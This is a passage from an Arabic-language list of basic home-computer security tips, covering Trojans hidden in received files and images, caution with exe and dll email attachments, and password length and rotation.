ﺍﻟﺒﺮﻧﺎﻣﺞ ﺍﻟﻤﻜﺎﻓﺤﺔ ﻟﻠﻔﻴﺮﻭﺳﺎﺕ
ﻭﺍﻟﺘﺮﻭﺟﺎﻥ ﻣﻦ ﺧﻼﻝ ﺷﺒﻜﺔ ﺍﻹﻧﺘﺮﻧﺖ ·
ﺭﺍﺑﻌﺎً : ﺍﺳﺘﻘﺒﻞ ﺍﻟﻤﻠﻔﺎﺕ ﺃﻭ ﺍﻟﺒﺮﺍﻣﺞ ﺃﻭ
ﺍﻟﺼﻮﺭ ﻣﻦ ﺃﺷﺨﺎﺹ ﺗﺜﻖ ﺑﻬﻢ ﻓﻘﻂ ،
ﻭﺇﻥ ﻟﻢ ﺗﻔﻌﻞ ﺫﻟﻚ، ﻓﻌﻠﻰ ﺍﻷﻗﻞ ﻻ ﺗﻘﻢ
ﺑﻔﺘﺤﻬﺎ ﺇﻻ ﺑﻌﺪ ﺍﻧﻘﻄﺎﻋﻚ ﻋﻦ ﺍﻻﺗﺼﺎﻝ ،
ﻭﺑﻌﺪ ﻓﺘﺤﻬﺎ ﺟﻤﻴﻌﺎً ﻗﻢ ﺑﻌﻤﻠﻴﺔ ﺑﺤﺚ ﻋﻦ
ﺍﻟﺘﺮﻭﺟﺎﻥ ﺑﻮﺍﺳﻄﺔ ﺑﺮﻧﺎﻣﺞ Cleaner
ﻋﻠﻰ ﻗﺮﺻﻚ ﺍﻟﺼﻠﺐ ﻟﺘﺘﺄﻛﺪ ﻣﻦ ﺧﻠﻮﻩ ﻣﻦ
ﺍﻟﺘﺮﻭﺟﺎﻥ ، ﻓﺎﻟﺘﺮﻭﺟﺎﻥ ﻟﻪ ﺧﺎﺻﻴﺔ ﺍﻟﺬﻭﺑﺎﻥ
ﻓﻰ ﺍﻟﻨﻈﺎﻡ ، ﻋﻠﻤﺎً ﺑﺄﻥ ﺣﺠﻤﻪ ﻳﺘﺮﺍﻭﺡ ﻣﻦ
50 ﺇﻟﻰ 150 ﻛﻴﻠﻮ ﺑﺎﻳﺖ ﺣﺴﺐ ﻧﻮﻋﻴﺘﻪ ﻭ
ﺇﺻﺪﺍﺭﻩ · (ﻗﺪ ﺗﺴﺘﻘﺒﻞ ﺻﻮﺭﺓ ﺃﻭ ﻣﻠﻒ ﻭ
ﻳﻜﻮﻥ ﺍﻟﺘﺮﻭﺟﺎﻥ ﻣﺰﺭﻭﻋﺎ ﺑﺪﺍﺧﻠﻬﺎ ﻟﺬﻟﻚ
ﺍﺣﺬﺭ )
ﺧﺎﻣﺴﺎً : ﺇﺍﺫﺭ ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ ﺗﺄﺗﻴﻚ ﻋﻦ
ﻃﺮﻳﻖ ﺍﻟﺒﺮﻳﺪ ﺍﻹﻟﻜﺘﺮﻭﻧﻲ، ﻓﺈﺫﺍ ﻛﺎﻥ
ﺍﻟﻤﻠﻒ ﺍﻟﻤﺮﺳﻞ ﺇﻟﻴﻚ ﻣﻦ ﺷﺨﺺ ﻻ ﺗﺜﻖ
ﺑﻪ ﻭ ﻣﻦ ﻧﻮﻉ dll ﺃﻭ exe ﻓﻼ ﺗﺴﺘﻘﺒﻠﻪ
ﺃﺑﺪﺍً ﺃﺑﺪﺍً ﺃﺑﺪﺍً ﺃﺑﺪﺍً ﺃﺑﺪﺍً ·
ﺳﺎﺩﺳﺎً ﻭ ﺃﺧﻴﺮﺍً : ﻳﻔﻀﻞ ﺃﻥ ﻳﻜﻮﻥ ﺭﻗﻤﻚ
ﺍﻟﺴﺮﻱ ﻣﻜﻮﻧﺎ ﻣﻦ ﺣﺮﻭﻑ ﻭﺃﺭﻗﺎﻡ،
ﻭﻳﻜﻮﻥ ﺃﻛﺜﺮ ﻣﻦ 8 ﺧﺎﻧﺎﺕ ، ﻛﻤﺎ ﻳﻔﻀﻞ
ﺗﻐﻴﻴﺮﻩ ﻋﻠﻰ ﺍﻷﻗﻞ ﻛﻞ ﺷﻬﺮ · ﺃﻧﺖ ﺍﻵﻥ
ﻓﻰ ﺃﻣﺎﻥ ﻣﻦ ﺍﻟﻬﺎﻛﺮﺯ ﺇﻥ ﺷﺎﺀ ﺍﻟﻠﻪ